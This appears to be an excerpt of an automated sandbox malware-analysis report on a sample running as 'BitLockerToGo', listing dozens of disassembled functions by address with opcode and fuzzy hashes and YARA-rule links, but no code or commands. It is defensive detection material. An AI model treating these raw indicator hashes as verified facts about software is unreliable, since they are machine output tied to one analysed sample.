API ID:
String ID:
API String ID:
Opcode ID: f0a34f726880481a4e46f1ced6a1bb8b2e4f5bfa9eb546414c4021ed59df7d8f
Instruction ID: 087c56cd9cbd8d81cb5c6fb808f972f719bf10607c0ad8c849056b0a9c663aff
Opcode Fuzzy Hash: f0a34f726880481a4e46f1ced6a1bb8b2e4f5bfa9eb546414c4021ed59df7d8f
Instruction Fuzzy Hash: F3315C73A26D200B5348883D8C1216BBAD29FD6734B2DC72D7ABADB2E4D63489114689

Function 0040CE90 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99b247e5c79b585d35dfaf1e7ee6254fa7a845dc9ba2150ee7ae76a5e5c91459
Instruction ID: dced18e84817fd73b9cfdf1361fb4740eb61101e2d1956ab9d111d5edaf316f9
Opcode Fuzzy Hash: 99b247e5c79b585d35dfaf1e7ee6254fa7a845dc9ba2150ee7ae76a5e5c91459
Instruction Fuzzy Hash: DD31FB73E66E104B5344D97E8C4416BBAD39BD6330B2EC73C7AB8D72E4D67989124284

Function 00447000 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72d61573629bd0c89225883c42fc2cb27ec486fc2be7fd63603c3282692d60df
Instruction ID: 76f25607d26a6dbbcd24a363faf4f32f4fbffe9865006a218abf307988624465
Opcode Fuzzy Hash: 72d61573629bd0c89225883c42fc2cb27ec486fc2be7fd63603c3282692d60df
Instruction Fuzzy Hash: 62314A73A29D2107931C9C7D8D1616779D39BC6634B2EC73DBEBAE73E4EA248D014680

Function 004125F0 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6b3954c4846c4ef1879dc5641db7b81f7b43a7c956e9afdd40e0ac956b3ec8f
Instruction ID: b2166efccf06dab2e8e3dae110d937f8ede846a02d82894dfe3742e81236e559
Opcode Fuzzy Hash: d6b3954c4846c4ef1879dc5641db7b81f7b43a7c956e9afdd40e0ac956b3ec8f
Instruction Fuzzy Hash: 2931AF33A65D100B9348CD7D8C0226BBAC35BD6770F2AC73D79B5D72E4D678CA024645

Function 00423DC0 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 216ba9e7e296450b17b03468ad83edaf0117db4a3c52e336a8424a6e40e9da14
Instruction ID: 5daab64a59e41bb5f94363a78da4320db803654f4d5d151ca69db18e75f144fa
Opcode Fuzzy Hash: 216ba9e7e296450b17b03468ad83edaf0117db4a3c52e336a8424a6e40e9da14
Instruction Fuzzy Hash: E7312773E25D200B835C8D7D9C1126ABAD19B95730F2E873D7EB6E72E0DB648D104694

Function 0042DE50 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bfed993d53edef78cca5bd69a2cd4c86deae4b0aa9783c8820a3580cda8def9
Instruction ID: ca66c6bca23d58142d2b1f7f00ab2057c28734262ac30377f891ffb80a877fb4
Opcode Fuzzy Hash: 7bfed993d53edef78cca5bd69a2cd4c86deae4b0aa9783c8820a3580cda8def9
Instruction Fuzzy Hash: 88318B33E25D240B53589D7E8D14167BAC3ABC673072E873D7EB9E72E4CA648D014284

Function 0043FE60 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02258e733c8d8aa8f96df0507fdd8750df29b2034d36125ddfc155c4294d2cb6
Instruction ID: dc27443576fe2e6d3122d3d161a4718f5798c69bc25f6a3c0586a61c2f6aa16c
Opcode Fuzzy Hash: 02258e733c8d8aa8f96df0507fdd8750df29b2034d36125ddfc155c4294d2cb6
Instruction Fuzzy Hash: D0313073A35D710B535C8C3C8C25266B9929BC2730B2A873DBEB6E72E4DB68CD014248

Function 004271F0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fe69490375fdd19f33850e6cef57984d97e82705de37f8319e53aa3a8a826ef
Instruction ID: 9afa1a5f72012832ac920461886cd976e67f3f7c4baeb864457e59d48e6819fd
Opcode Fuzzy Hash: 6fe69490375fdd19f33850e6cef57984d97e82705de37f8319e53aa3a8a826ef
Instruction Fuzzy Hash: 1631A973F25D200B638CCC3E8C22177A9839BC673072EC32D69B5D72E8EA7889120254

Function 0041BC90 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7a974169caf3885aaeace5f1113da9d3171df881a71a8d7c3b536426daf00f
Instruction ID: 426f61dd95194d84419bc5cee9d3453752dc51f5f85f6cedcb27e1d109870038
Opcode Fuzzy Hash: 1b7a974169caf3885aaeace5f1113da9d3171df881a71a8d7c3b536426daf00f
Instruction Fuzzy Hash: 4C317AB3E26D200BD35C8C7D8C15267A9826B86730F3F877D7EB5E72E0D76889114288

Function 00411980 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0add62d509aeee32f1fd436641d6a2cc9a72babfc3a8f4cd179ebd4a1abefae6
Instruction ID: dd97f3617202b65a1c64a43636298052601bfba6a1a91dd059b7d607e9fbec64
Opcode Fuzzy Hash: 0add62d509aeee32f1fd436641d6a2cc9a72babfc3a8f4cd179ebd4a1abefae6
Instruction Fuzzy Hash: 53315E73E52D200B9318CC7E8C51267A9C39BC6730B2EC7797DB6D72E8DA788D120280

Function 00432E30 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8975c954d359aa829a761a32d41e5624693b8652bedef36dab1af646259b690f
Instruction ID: 4d298ab4b884cb162999c166f322a47921b585b624b65068a53f3f6bfb9e80e8
Opcode Fuzzy Hash: 8975c954d359aa829a761a32d41e5624693b8652bedef36dab1af646259b690f
Instruction Fuzzy Hash: 3F318173B659201BA30CCC7D8C5526A79D38BC6330B2EC33D79B6E73E8D67889020244

Function 0041DDA0 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79d1306ea949624248000d9022bccf218235c8ae9f4286882c67ef04406a802a
Instruction ID: b9b300b856bd9a92eacb0bc399b7309528d013ba224a1a88cd23cb8bc855ab4f
Opcode Fuzzy Hash: 79d1306ea949624248000d9022bccf218235c8ae9f4286882c67ef04406a802a
Instruction Fuzzy Hash: C7315CB3F65D110B934CC83E8C522A769939BC5734B2DC72E6676CB3E8DA7CC8164241

Function 00424A00 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87cc3d4ce64d89480a74b5e20c75e9e58580bc1668eb46d050242906fc5a10de
Instruction ID: a07cf3d9cd99d9a6ad600b7ce190773d98a33a6d78f65bb0a64e673f4499b890
Opcode Fuzzy Hash: 87cc3d4ce64d89480a74b5e20c75e9e58580bc1668eb46d050242906fc5a10de
Instruction Fuzzy Hash: B8314BB3E559200B9318DD7E8D1522ABDD29BC6330F2AC72DBDB9E76E4DA648D110680

Function 0041C0E0 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf448ba0f05bf28aee6549ce2853a47d37eb006113451fc4d58d29f1290df685
Instruction ID: 660e81f88a2665b3d3b1def466ba1ae56fac2f9af4894a187cc961a4b836f188
Opcode Fuzzy Hash: bf448ba0f05bf28aee6549ce2853a47d37eb006113451fc4d58d29f1290df685
Instruction Fuzzy Hash: 6F216273F25D1107970CCD3D8C2626A69D39BD5230B2EC37DB976DB7E8EA7888024140

Function 0041D270 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b62d5b9ad445bc2a4d1d99d944f68a51b721237d33037e09a7f3afe609ef606
Instruction ID: 04cc295664cdc9a8cecb23a93efd80e5ffcd8a45e1e1778a19911e8ce4539043
Opcode Fuzzy Hash: 5b62d5b9ad445bc2a4d1d99d944f68a51b721237d33037e09a7f3afe609ef606
Instruction Fuzzy Hash: 89310A73E66D210BA348C83E8C51267BD835BD6330B3AC73979B4D72F8D7788A124649

Function 00412A60 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cf3fe8418ed6be3936bf2aec5437baf9eda8a01ea0b65789846a5007a966683
Instruction ID: 90b131d5e2899e211875316e451a6618d775de94d999ec785eb92c8b90193613
Opcode Fuzzy Hash: 9cf3fe8418ed6be3936bf2aec5437baf9eda8a01ea0b65789846a5007a966683
Instruction Fuzzy Hash: 00312E73F35D21079358C83D8C16266A9D29BD6330B2EC73E7DB6D72E4EA78C8514285

Function 0041CDF0 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1b132042d394e2d79a15fd439f098d03b3da8a4d9992fdb0e73f3ebf92f4d5f
Instruction ID: 2c24061b8256c6a598278d9bd12ff6def5b26aacb9da18e29e2c5693a8c7eb99
Opcode Fuzzy Hash: f1b132042d394e2d79a15fd439f098d03b3da8a4d9992fdb0e73f3ebf92f4d5f
Instruction Fuzzy Hash: DE319173B25D200B9348C83E8C6116779D36BD6334B2D873D7AB6DB3E4D6798E114280

Function 00440170 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8406c38fd4a392369585001bd7bc5bc787e7dc5b27c99adca868f6217bc0e53e
Instruction ID: b18996b1104383b26052946640f4d244a82aebd821879f4f5de7ce57a9d6d862
Opcode Fuzzy Hash: 8406c38fd4a392369585001bd7bc5bc787e7dc5b27c99adca868f6217bc0e53e
Instruction Fuzzy Hash: A2216D33E26E200BA344DC7E8C40657BAD39BC6734F2A87397EB8E72E4D6748D114685

Function 0041B960 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615972bb1932ee00bc82bc190eb654203d243d37cf375da9eb4e839b440e5111
Instruction ID: 2e2e7694a033fd1769b2db791b5cefa5c8a2d37dc623d566418fed2dde392ed6
Opcode Fuzzy Hash: 615972bb1932ee00bc82bc190eb654203d243d37cf375da9eb4e839b440e5111
Instruction Fuzzy Hash: 41315A73E26D710B9308C87D8C05256A9935BD2730B2F877AADF4E72E8D6788D1242C8

Function 00447120 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc523705479f70e23e6beed1a5f93e9174d2bc8bf6dbe821b7af9054e2ebeb75
Instruction ID: 3bedf27a2812986002a6585c239a2d6742f1a2fe1435c784eccf47921c8b164b
Opcode Fuzzy Hash: dc523705479f70e23e6beed1a5f93e9174d2bc8bf6dbe821b7af9054e2ebeb75
Instruction Fuzzy Hash: 73212D73E25C2107A348CC7D8D1526779C34BC2730F2AC7397EB5D72E8DA3889120285

Function 0040E210 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60a29e26a4ee89bd30dd342ab2232b6ecb02c6da684197a656b2e622137a5a46
Instruction ID: 9385e50e3aaffb48933e35850009d7c3590bd90a8eadca7cf2626bb1ef2039d3
Opcode Fuzzy Hash: 60a29e26a4ee89bd30dd342ab2232b6ecb02c6da684197a656b2e622137a5a46
Instruction Fuzzy Hash: F1219477E62D21079358883DDC12367A9C39BD2730F2EC33DB9B5C72E8D63889124284

Function 00424470 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b7487d88c34ffb42a5017626f3416459e1b8ad4d5d57befe22f4238bb7dc7a1
Instruction ID: c3ded6c98625ecb5281fff054066929ff21565f34b02d78c16b939b3ffd4d493
Opcode Fuzzy Hash: 5b7487d88c34ffb42a5017626f3416459e1b8ad4d5d57befe22f4238bb7dc7a1
Instruction Fuzzy Hash: A9212E73E26D31075318C97D8C12167A9D25BC6770B2AC37EBDB6D72E4DA748D114284

Function 0042E3F0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea70284177a8d8e9ebaefdbd22e877d2bd50e20d35c8872f6df7c8f5c9575321
Instruction ID: afcf453d26dd5ab90f1f1b6e75332b587d6b6e55b9a765420cfca77ece5ce88b
Opcode Fuzzy Hash: ea70284177a8d8e9ebaefdbd22e877d2bd50e20d35c8872f6df7c8f5c9575321
Instruction Fuzzy Hash: D4217CB3E66D600BD3548C7D8C01367AD926BD2730F2B8B2D6EB5DB2E0D668C9110284

Function 0041E4B0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ec1880a57c79eb1b2902485c423b2483052d85c462438763d0f2a4f856ebcef
Instruction ID: 3013e5ca1fc020bf5072dcc77d3eade307347a2f0792bf8accc76ba8ddcddc9a
Opcode Fuzzy Hash: 5ec1880a57c79eb1b2902485c423b2483052d85c462438763d0f2a4f856ebcef
Instruction Fuzzy Hash: DC213973E27D210793588D7D8C1116BA9C35BC2730B3B877EBEB5D72E8DA3489024688

Function 0044F620 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f0cff0411c52413ceea16306266ea7e8649ac46ef70d07e8a0dceba8b6325d
Instruction ID: ab344937ae2ff970a2265d962b1ae23d63291c03a22c258d2d999268f8750d54
Opcode Fuzzy Hash: b4f0cff0411c52413ceea16306266ea7e8649ac46ef70d07e8a0dceba8b6325d
Instruction Fuzzy Hash: EC219C73E62D300B534C887D8C22267ADD69BC633073A873E6DB6E73E4DA6C8D114694

Function 0043FA00 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f8eead9363aa5f9fce9743da99c50251ea3fff286115bd8bc7ad008b78a921
Instruction ID: 79b26046f052b68d3abe496d9d25e36349981165bafe9a369dce87b13939a234
Opcode Fuzzy Hash: 10f8eead9363aa5f9fce9743da99c50251ea3fff286115bd8bc7ad008b78a921
Instruction Fuzzy Hash: 7D312773E25D214B8348CC3D8C11267BD938BD2730F2ACB3D7EB6D72E5D6688A114688

Function 0042E020 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baa5d32eec5ae1f1284dd8ec811077842a295f1c474614b93d5c2d64f4230dc3
Instruction ID: 66bacc5bc8c0f13d2059c5cf62d5f077fcbd5dfc7a7badb5f3b5d033d8b57891
Opcode Fuzzy Hash: baa5d32eec5ae1f1284dd8ec811077842a295f1c474614b93d5c2d64f4230dc3
Instruction Fuzzy Hash: 30211D77E65D200B9358C93D8C1226B69939BD6730B2AC73D7DB9E72E8C63C89124284

Function 00424F60 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e31e992d86e2efcf2f96b275a51ba0363a10fc8d174516aee1f70f8b5c83ae2
Instruction ID: e4683ef9913f652fc7aeef7ead9f90a3399409ec788016a3af88d6e5901e3c9a
Opcode Fuzzy Hash: 7e31e992d86e2efcf2f96b275a51ba0363a10fc8d174516aee1f70f8b5c83ae2
Instruction Fuzzy Hash: A0217FB3E25D61078708CC3C9C5126B6A839BD1730B2F873D7EB6EB7E4DA248C454285

Function 00424090 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7cf262f7959bf3cd5810edd049bbc4d45e69f9c99f49cf644c22c183bf51a9a
Instruction ID: 899cd6cd3679753fbd81492d3530a6557904663fbfac32771460fda8612f37d3
Opcode Fuzzy Hash: f7cf262f7959bf3cd5810edd049bbc4d45e69f9c99f49cf644c22c183bf51a9a
Instruction Fuzzy Hash: F4213973E26D600B9358DD3E8C01257BAD39BC6730B2AC739BDB4DB2E8D674C9024285

Function 0042E590 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e9a771f26aa7eaf6725b949efffcbb55847583a9af4447de78c04f3d741ecf
Instruction ID: 901fa1b55c324c704d255b85454a32b333625271fab583fd2ed098f858578520
Opcode Fuzzy Hash: 54e9a771f26aa7eaf6725b949efffcbb55847583a9af4447de78c04f3d741ecf
Instruction Fuzzy Hash: 3A215C73E669200BE354C97E9C413177DD39BC6330F2AC72979B8DB2E4DA78C9124281

Function 0043ED90 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28f1f611a038fba0ca09623b40b29d630010c8cdc1032a5fd5c0a64506259d44
Instruction ID: c6c9e7379dad563046c59e06d67910c979ff41c3b8107cd93a9efe09112c944d
Opcode Fuzzy Hash: 28f1f611a038fba0ca09623b40b29d630010c8cdc1032a5fd5c0a64506259d44
Instruction Fuzzy Hash: CE217F77E65D2107834CDC3C8C252677E938B96730B7DC76E3A72C72E4DA6889114284

Function 0041CA30 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 743cb2a1071d11a23f95c3695a371d1d6e449a2df08f6c6038817bf7ec9f3404
Instruction ID: 2b0d8622bf27b56b4f3ed67dbade855bdb644fcc28217f722084fc5a375fa447
Opcode Fuzzy Hash: 743cb2a1071d11a23f95c3695a371d1d6e449a2df08f6c6038817bf7ec9f3404
Instruction Fuzzy Hash: 57213E33B25D2107570CCD7D9D2626ABAD39AC6374B1DC73DB9B6D33E8E63888054684

Function 00434CC0 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f87966b5a229a8af6e3dc703d7a3fb24e6859cf1c6d7d95cde09660083b13c3
Instruction ID: b93289940db43f013766ab664ce8477544867525ce1bfad29afcef86fd8d9d55
Opcode Fuzzy Hash: 3f87966b5a229a8af6e3dc703d7a3fb24e6859cf1c6d7d95cde09660083b13c3
Instruction Fuzzy Hash: E6216073F269210B874CDC3C8C1126A7ED35BD6370B2AC73E79B6D72E4DA7889514289

Function 0043F8F0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10f9aa239e40d22d531786ba89aca0630f754201ef1bb5b013eaa4dee974c1e1
Instruction ID: f0ededa674e262906757a018c7183eebd253faefb4a7357b171e5ee289141495
Opcode Fuzzy Hash: 10f9aa239e40d22d531786ba89aca0630f754201ef1bb5b013eaa4dee974c1e1
Instruction Fuzzy Hash: 32212A73E26D61079354CD7E8C04257B9935BD2B31B2EC3697EB5AB2E8C7308D124289

Function 0043F6D0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7f9a748c911dffe15b8c253053de0a6b09dbedbeb16e8f2ce2443f9438248e8
Instruction ID: 6c9524bb271dd875215e4851f408be99c40cde575957e992bc0f3bd110fbd6fe
Opcode Fuzzy Hash: e7f9a748c911dffe15b8c253053de0a6b09dbedbeb16e8f2ce2443f9438248e8
Instruction Fuzzy Hash: 68213873A66D210BD3488D7D8C51267BAD39BC6330F3A8B39BDB9D72E0D678C9124244

Function 004464F0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cabd89aa317076688fe24e530191489ab75b86d11f50efa43e9a0a75a77cea3
Instruction ID: 412faec25b5cea2a66a40cb7663871c87093201b29fc4d777c0bb20925cf1d77
Opcode Fuzzy Hash: 1cabd89aa317076688fe24e530191489ab75b86d11f50efa43e9a0a75a77cea3
Instruction Fuzzy Hash: DE219FB3A2492107D34C9C3DCC1526ABAD25BD6330B2E873EBDB5D33E8D238C8024280

Function 0041D720 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb4de0d31e275cb50a653231b01146ede34b591d6b64301ec2f7e897171e0c3
Instruction ID: f76ba3465d42972d75432514a8481d409eb7b0e53bee9388f166d44ddbdcdbce
Opcode Fuzzy Hash: 2cb4de0d31e275cb50a653231b01146ede34b591d6b64301ec2f7e897171e0c3
Instruction Fuzzy Hash: 1821C273E659210AD358C97E8C01366B9925BC2730F2ACB397DB5DB2E4CA68C9224285

Function 0044F870 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2588233545.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ed912561602d1a0aa612b2fee08c04a8d196eafd0ece5b18eb65bb667c47094
Instruction ID: 8b840fae2cf84aae725c6d4d5d4991590c96994d5ec61fbe8ed0f0ff03b278bb
Opcode Fuzzy Hash: 5ed912561602d1a0aa612b2fee08c04a8d196eafd0ece5b18eb65bb667c47094
